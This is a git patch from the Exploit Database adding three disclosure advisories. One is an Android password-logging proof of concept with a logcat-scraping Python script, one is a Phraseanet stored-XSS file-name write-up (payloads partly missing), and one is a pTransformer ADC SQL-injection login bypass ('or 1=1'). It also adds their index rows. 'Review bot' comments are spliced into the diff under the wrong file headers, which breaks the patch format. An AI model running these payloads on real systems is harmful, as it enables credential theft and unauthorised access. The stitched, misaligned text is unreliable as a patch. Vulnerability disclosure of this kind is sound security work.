From 1a6935f64aa2e5e3e0b9fb2a15aee17a6f291027 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 29 May 2019 05:01:59 +0000
Subject: [PATCH] DB: 2019-05-29
3 changes to exploits/shellcodes
Microsoft Windows - 'Win32k' Local Privilege Escalation
EquityPandit 1.0 - Password Disclosure
Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass
Phraseanet < 4.0.7 - Cross-Site Scripting
---
 exploits/android/local/46933.txt | 48 +++++++++++++++++++++++++++++
 exploits/multiple/webapps/46935.txt | 20 ++++++++++++
 exploits/windows/remote/46934.txt | 24 +++++++++++++++
 files_exploits.csv | 5 ++-
 4 files changed, 96 insertions(+), 1 deletion(-)
 create mode 100644 exploits/android/local/46933.txt
 create mode 100644 exploits/multiple/webapps/46935.txt
 create mode 100644 exploits/windows/remote/46934.txt
diff --git a/exploits/android/local/46933.txt b/exploits/android/local/46933.txt
new file mode 100644
index 000000000..317756931
--- /dev/null
+++ b/exploits/android/local/46933.txt
@@ -0,0 +1,48 @@
+#Exploit title: EquityPandit v1.0 - Insecure Logging
+#Date:27/05/2019
+#Exploit Author: ManhNho
+#Software name: "EquityPandit"
+#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
+#Version: 1.0
+# Category: Android apps
+#Description:
+
+ - Sometimes developers keeps sensitive data logged into the developer
+ console. Thus, attacker easy to capture sensitive information like password.
+ - In this application, with adb, attacker can capture password of any
+ users via forgot password function.
+
+#Requirement:
+
+ - Santoku virtual machine
+ - Android virtual machine (installed "EquityPandit" apk file)
+ - Victim user/password: victim@abc.com/123456
+ - Exploit code named capture.py in Santoku vm as below:
+
+import subprocess
+import re
+
+process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
+stdout=subprocess.PIPE)
+dumps = process_handler.stdout.read()
+password_list = re.findall(r'password\s(.*)', dumps)
+print 'Captured %i passwords! \nThey are:' %len(password_list)
+for index, item in enumerate(password_list):
+ print '\t#%i: %s' %(int(index)+1, item)
+
+#Reproduce:
+
+ - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)
+
+adb connect x.x.x.x
+
+
+ - Step 2: From Android machine, open EquityPandit, click forgot password
+ function for acccount "victim@abc.com" and then click submit
+ - Step 3: From Santoku, execute capture.py
+ - Actual: Password of "victim@abc.com" will be show in terminal as
+ "123456"
+
+#Demo:
+
+https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46935.txt b/exploits/multiple/webapps/46935.txt
new file mode 100644
index 000000000..3b7e7084b
--- /dev/null
+++ b/exploits/multiple/webapps/46935.txt
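Review bot: The capture.py listing in this hunk is Python 2 only and the header never says so: `print 'Captured %i passwords! \nThey are:' %len(password_list)` is the statement form, and `re.findall(r'password\s(.*)', dumps)` applies a str pattern to `dumps`, which under Python 3 would be the bytes returned by `process_handler.stdout.read()` and raise TypeError, so a `#Python version: 2.7` line under `#Requirement:` would avoid a misleading failure. The advisory also gives no remediation even though the root cause it describes is the app writing the recovered password to logcat, where any adb-attached host can read it; a closing line such as `#Fix: never log credentials or reset tokens; logcat output is readable by any host with adb access` would make the defensive takeaway explicit. The files_exploits.csv row added in this commit records the entry as "Password Disclosure" dated 2019-05-28, whereas the file header says "Insecure Logging" and `#Date:27/05/2019`; one of the two should be aligned.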
@@ -0,0 +1,20 @@
+# Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software
+# Date: 10/10/2018
+# Exploit Author: Krzysztof Szulski
+# Vendor Homepage: https://www.phraseanet.com
+# Software Link (also VM): https://www.phraseanet.com/en/download/ # Version affected: 4.0.3 (4.0.4-dev) and below
+# Version fixed: 4.0.7
+# Proof of concept.
+
+Phraseanet is an Open Source Digital Asset Management software distributed under GNU GPLV3 license.
+Registered user (or even guest user, depends of configuration) can upload pictures, videos, pdfs or any other document.
+A crafted file name for uploaded document leads to stored XSS. In simplest form the name of the file would be:
+">.jpg
+or:
+">.jpg
+Please notice that the file name should start from double quotation mark.
+Once a picture will be uploaded it will pop up an alert window and keep popping up every time anybody will login to the website.
+Another example of more malicious usage would be this file name:
+">.jpg
+From now on every attempt to login will end up with redirection one step back - to login page.
+Please be aware that this will not affect Chrome browser and other browsers built on chrome engine which has XSS filter built in.
\ No newline at end of file
diff --git a/exploits/windows/remote/46934.txt b/exploits/windows/remote/46934.txt
new file mode 100644
index 000000000..7e6a2f996
--- /dev/null
+++ b/exploits/windows/remote/46934.txt
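Review bot: Two header fields share one line in the new file, `# Software Link (also VM): https://www.phraseanet.com/en/download/ # Version affected: 4.0.3 (4.0.4-dev) and below`, and should be split into `# Software Link (also VM): https://www.phraseanet.com/en/download/` and `# Version affected: 4.0.3 (4.0.4-dev) and below` like every other one-field-per-line header. The three example file names appear here as just `">.jpg`, which looks like markup lost in rendering rather than the file's content; if the committed file really holds only that fragment, the `# Proof of concept.` header overstates what the text demonstrates and should say the payload was redacted. The root cause is implied but never stated: a sentence such as `The uploaded file name is rendered into the page without HTML encoding` would name the defect, and the remediation (output-encode the name wherever it is displayed) is what a defender running a version older than the listed fix, 4.0.7, needs to verify.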
@@ -0,0 +1,24 @@
+# Exploit Title: Petraware pTransformer ADC before 2.1.7.22827 allows SQL
+Injection via the User ID parameter to the login form.
+# Date: 28-05-2019
+# Exploit Author: Faudhzan Rahman
+# Website: https://faudhzanrahman.blogspot.com/
+# Vendor Homepage: http://www.petraware.com
+# Version: 2.0
+# CVE : CVE-2019-12372
+# Tested on: Windows 10 Pro
+
+*Description*
+
+The login form on pTransformer ADC does not filter dangerous character such
+as single quote ('). This has cause the application to be vulnerable to SQL
+Injection.
+
+*Proof-of-concept*
+
+The vulnerable parameter is User ID. By injecting ' or '1'='1'-- ,it will
+bypass the login form.
+
+*Reference*
+
+https://faudhzanrahman.blogspot.com/2019/05/sql-injection-on-login-form.html
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f5cbbfdcc..d6a6f7f3f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
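Review bot: The header's `# Version: 2.0` does not agree with the title's `before 2.1.7.22827` or with the files_exploits.csv row added in this commit (`< 2.1.7.22827`); the tested version and the fixed version are different facts and the header should carry both, e.g. `# Version: 2.0 (fixed in 2.1.7.22827)`. The description frames the defect as the form not filtering "dangerous character such as single quote", which points readers at the wrong fix: the cause is presumably that the User ID value is concatenated into the login query, and parameterized queries, not character filtering, are the remediation worth stating. `# Tested on: Windows 10 Pro` describes the client, but for a web login form the server-side stack is what matters for anyone triaging exposure, so saying which side was tested would help. The `# CVE : CVE-2019-12372` line also carries a stray space before the colon, unlike the other header fields.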
@@ -10527,8 +10527,9 @@ id,file,description,date,author,type,platform,port
 46914,exploits/macos/local/46914.rb,"Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)",2019-05-23,Metasploit,local,macos,
 46918,exploits/windows/local/46918.txt,"Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation",2019-05-22,SandboxEscaper,local,windows,
 46919,exploits/windows/local/46919.txt,"Microsoft Internet Explorer 11 - Sandbox Escape",2019-05-22,SandboxEscaper,local,windows,
-46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,ExpLife0011,local,windows,
+46920,exploits/windows/local/46920.txt,"Microsoft Windows - 'Win32k' Local Privilege Escalation",2019-05-15,Arch-Vile,local,windows,
 46922,exploits/windows/local/46922.py,"Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow",2019-05-24,"Uday Mittal",local,windows,
+46933,exploits/android/local/46933.txt,"EquityPandit 1.0 - Password Disclosure",2019-05-28,ManhNho,local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17467,6 +17468,7 @@ id,file,description,date,author,type,platform,port
 46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
 46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
+46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41352,3 +41354,4 @@ id,file,description,date,author,type,platform,port
 46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
 46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,
 46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,
+46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,